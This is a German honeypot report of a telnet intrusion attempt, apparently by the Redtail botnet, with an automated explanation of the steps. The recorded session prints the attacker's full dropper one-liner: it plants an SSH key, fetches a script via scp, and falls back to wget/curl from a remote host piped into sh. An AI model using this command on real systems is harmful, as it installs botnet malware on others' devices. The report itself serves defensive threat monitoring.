ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Malaysia: Schadcode nachladen und Benutzerliste auslesen

30.09.2026, 19:21 UTC · 16 Befehle · über telnet · Malaysia

Überblick

Dienst
telnet (Port 23)
Herkunft
Malaysia · Alibaba (US) Technology Co., Ltd.
Probierte Zugangsdaten
admin / admin

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@srv01:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr
admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
auth_ok
admin@srv01:~$ enable
bash: enable: command not found
admin@srv01:~$ system
bash: system: command not found
admin@srv01:~$ shell
bash: shell: command not found
admin@srv01:~$ sh
admin@srv01:~$ bash
admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
bash: syntax error near unexpected token `||'
'-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
bash: syntax error near unexpected token `newline'
'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\…
bash: syntax error near unexpected token `newline'
'rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\x6F\x6B"
redtail_bot_telnet_ok

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich über Telnet mit den Standardzugangsdaten admin und admin an. Nach der Prüfung der Benutzerrechte und der Systemkonfiguration versuchte er, in eine tiefere Shell-Ebene zu wechseln. Anschließend lud er einen SSH-Schlüssel herunter und versuchte, ein Skript von einem externen Server zu beziehen und auszuführen.

Was die Befehle bewirken

Die Befehle id und cat /etc/passwd dienen der Erkundung der Benutzerrechte und der installierten Konten. Der Befehl echo mit Hexadezimalwerten erzeugt eine kurze Bestätigungsnachricht, möglicherweise als Platzhalter oder Test. Die Befehle enable, system, shell, sh und bash versuchen, verschiedene Shell-Interpreten zu starten, um volle Systemkontrolle zu erlangen. Der lange Befehl speichert einen privaten SSH-Schlüssel in eine Datei, konfiguriert SSH für unsichere Verbindungen und versucht, ein Skript namens out_sh von einem fremden Server zu laden. Falls das Laden per SCP scheitert, wird das Skript stattdessen über wget oder curl heruntergeladen und direkt im Speicher ausgeführt.

Worauf es hinauslief

Das Ziel ist die Installation einer Hintertür oder eines Botnet-Agents auf dem kompromittierten Gerät. Dies erkennt man am Versuch, einen privaten SSH-Schlüssel zu speichern und ein externes Shell-Skript über SCP oder HTTPS nachzuladen, was typisch für die Fernsteuerung von Geräten ist.

Einordnung

Dieses Muster ist sehr verbreitet bei automatisierten Botnetzen, die IoT-Geräte mit schwachen Passwörtern kompromittieren. Die Kombination aus Standardzugangsdaten und dem Versuch, Skripte über SCP oder HTTP zu laden, ist ein klassisches Merkmal von Malware wie Mirai oder ähnlichen Varianten.